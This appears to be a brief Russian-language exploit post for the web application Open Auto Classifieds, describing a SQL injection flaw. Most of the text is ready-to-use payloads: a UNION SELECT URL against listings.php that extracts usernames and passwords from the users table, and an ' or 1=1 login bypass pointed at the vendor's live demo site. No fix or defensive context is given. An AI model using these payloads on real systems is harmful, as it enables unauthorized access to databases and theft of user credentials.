Программа: Open Auto Classifieds
Уязвимость позволяет удаленному злоумышленнику выполнить произвольные SQL запросы в базе данных приложения.
Эксплоит:
http://127.0.0.1/listings.php?id=-1+union+select+1,2,3,concat(user,0x3a,pass) ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25+from+users
http://openautoclassifieds.com/login.php << from demo site 🙂
in Username field just type ' or 1=1 /*
